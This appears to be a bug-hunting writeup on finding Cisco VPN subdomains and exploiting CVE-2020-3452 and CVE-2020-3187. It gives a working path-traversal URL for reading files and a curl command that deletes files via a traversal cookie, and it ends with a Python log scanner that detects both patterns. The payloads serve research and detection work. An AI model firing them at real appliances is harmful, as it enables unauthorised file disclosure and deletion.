Hunting for CVE-2020-3187 and CVE-2020-3452
Back with another writeup. In this one I will discuss how easy it is to hunt for CVE-2020-3187 and CVE-2020-3452, and the steps involved.
NOTE: For this we need to focus on the subdomains of the target that are running Cisco VPN.
Let’s Start
Finding Subdomains: Sublist3r, AssetFinder, Amass
I simply used the above tools to find the subdomains and saved the entire result in a .txt file.
Now extract the subdomains that contain the keyword "vpn".
Example: vpn.example.com, vpn-us-east-1.example.com
So, on visiting these kinds of subdomains I got the following page.
Now reload the above page and capture the request in Burp Suite as shown below.
CVE-2020-3452
Modify the request URL to: +CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
and we can read the contents of the files, as shown in the response.
CVE-2020-3187
With this one we are able to delete files.
I deleted the logo file present on the server as the PoC, rather than deleting any other important file.
Below is the image which confirms the presence of the file on the server.
Now, to delete it, just run the following command in your terminal.
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
After this, the file was deleted from the server.
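As an added defender-side example (not part of the original writeup), here is a small Python scanner that runs over constructed web-portal access log lines and flags requests matching the two traversal patterns discussed above: a ../ sequence in a request to the +CSCOT+/+CSCOE+ handlers (CVE-2020-3452) and a ../ sequence inside the session token cookie (CVE-2020-3187). The log format, client IPs and sample lines in SAMPLE_LOG are assumed and constructed for this example; the scanner percent-decodes before matching so that the %2e%2e encoding of the same sequence is caught as well as the literal ../ shown in the writeup.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the original post). The assumed format is:
#   <client-ip> "<method> <path> HTTP/1.1" <status> "<Cookie header or ->"
SAMPLE_LOG = """\
203.0.113.5 "GET /+CSCOE+/logon.html HTTP/1.1" 200 "-"
203.0.113.7 "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 "-"
203.0.113.9 "GET /+CSCOE+/session_password.html HTTP/1.1" 200 "token=../+CSCOU+/csco_logo.gif"
203.0.113.11 "GET /+CSCOE+/session_password.html HTTP/1.1" 200 "token=abc123"
203.0.113.13 "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=%2e%2e/ HTTP/1.1" 200 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

TRAVERSAL = "../"


def normalise(value: str) -> str:
    """Percent-decode repeatedly (catches double encoding), lower-case,
    and fold backslashes so encoded traversal variants compare equal."""
    prev, cur = None, value
    for _ in range(3):  # bounded: stop once decoding is stable
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.lower().replace("\\", "/")


def classify(line: str):
    """Return a finding record for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = normalise(m["path"])
    cookie = normalise(m["cookie"])
    findings = []
    # CVE-2020-3452: traversal sequence in a request to the WebVPN
    # +CSCOT+/+CSCOE+ handlers (the writeup uses lang=../ on translation-table).
    if path.startswith(("/+cscot+/", "/+cscoe+/")) and TRAVERSAL in path:
        findings.append("CVE-2020-3452")
    # CVE-2020-3187: traversal sequence inside the session token cookie.
    if "token=" in cookie and TRAVERSAL in cookie.split("token=", 1)[1]:
        findings.append("CVE-2020-3187")
    return {"ip": m["ip"], "status": m["status"], "findings": findings}


def scan(log_text: str):
    """Run classify() over every non-empty line and keep only lines with findings."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = classify(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} status={hit["status"]} -> {", ".join(hit["findings"])}')
```

On the constructed sample, three of the five lines are flagged: the literal lang=../ request and its %2e%2e variant as CVE-2020-3452, and the cookie with token=../ as CVE-2020-3187, while the ordinary logon page request and the cookie with a normal token value pass. Matching on the decoded, lower-cased value rather than the raw string is the important design choice: a rule that only looks for the exact bytes from the writeup is trivially bypassed by re-encoding.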
Thanks for reading!!